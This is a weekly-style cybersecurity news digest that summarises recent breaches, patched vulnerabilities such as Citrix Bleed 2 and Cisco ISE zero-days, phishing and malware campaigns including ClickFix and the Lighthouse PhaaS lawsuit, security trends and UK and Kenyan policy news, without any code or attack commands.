Major Incidents or Breaches

  • Synnovis, a UK pathology services provider, has notified healthcare providers of a data breach resulting from a ransomware attack in June 2024, which led to the theft of patient data.
  • Over 67,000 fake npm packages have been published in a large-scale, worm-like spam attack, likely financially motivated, flooding the npm registry since early 2024.
  • DanaBot malware has resumed activity, infecting Windows systems after a six-month hiatus following law enforcement disruption in May 2024.
  • A campaign targeting Microsoft 365 users is leveraging Quantum Route Redirection to bypass email security and steal credentials, impacting victims in over 90 countries.
  • Phishing emails disguised as spam filter alerts are being used to steal user credentials.

Newly Discovered Vulnerabilities

  • Amazon’s threat intelligence team disclosed that an advanced threat actor exploited two zero-day vulnerabilities: “Citrix Bleed 2” (CVE-2025-5777) in Citrix NetScaler ADC/Gateway and CVE-2025-20337 in Cisco Identity Service Engine (ISE).
  • Microsoft released fixes for 63 security vulnerabilities, including a Windows kernel zero-day flaw currently under active exploitation.
  • Google Chrome (version 142) and Mozilla Firefox (version 145) have patched multiple high-severity vulnerabilities in their latest releases.
  • Ivanti and Zoom have patched high-severity vulnerabilities that could enable arbitrary file writes, privilege escalation, code execution, and information disclosure.
  • Intel, AMD, and Nvidia have published advisories addressing over 60 vulnerabilities in their products as part of their regular security updates.
  • Siemens, Rockwell, Aveva, and Schneider Electric have addressed vulnerabilities affecting industrial control systems.

Notable Threat Actor Activity

  • Google has filed a lawsuit in the US District Court against China-based threat actors operating the “Lighthouse” Phishing-as-a-Service (PhaaS) platform, attributed to the group “Smishing Triad.” The platform facilitated large-scale SMS phishing campaigns, including US toll scam texts, using over 194,000 malicious domains.
  • Advanced persistent threat actors exploited Citrix NetScaler and Cisco ISE zero-day vulnerabilities in coordinated attacks, demonstrating increased targeting of identity and access management systems.
  • The SmartApeSG campaign is using ClickFix social engineering techniques, including fake Cloudflare verification pages, to push NetSupport RAT malware.
  • Ongoing cyber threats have been identified against Cisco ASA and Firepower devices, as reported by CISA.

Trends, Tools, or Tactics of Interest

  • ClickFix attacks are becoming more sophisticated, with recent campaigns mimicking Cloudflare verification checks to trick users into executing malicious commands.
  • The Quantum Route Redirection technique in phishing campaigns simplifies attack steps and is being used to bypass traditional email security controls.
  • There is increased adversary interest in targeting identity and access management infrastructure, as evidenced by recent zero-day exploitation of Citrix and Cisco products.
  • Passkey management on Windows 11 now supports third-party applications, with 1Password and Bitwarden as initial partners, improving passwordless authentication options.
  • The return of DanaBot and the scale of npm spam attacks highlight persistent threats to software supply chains and end-user systems.
  • Google introduced “Private AI Compute,” a privacy-enhancing technology for secure AI processing in the cloud.
  • Token Security outlined methods to extend Zero Trust principles to autonomous AI agents, emphasizing scoped access and continuous verification.
  • Behavioral (TTP-based) detection is being promoted as more effective than traditional IoC-based hunting for identifying privilege escalation, credential theft, and lateral movement.

Regulatory or Policy Developments Affecting the Security Industry

  • The UK government has introduced new legislation to strengthen cybersecurity requirements for critical infrastructure, including hospitals, energy, water, and transport sectors.
  • Kenya has launched the “Code Nation” initiative to train one million workers in technology skills, with a focus on cybersecurity, software engineering, and data science.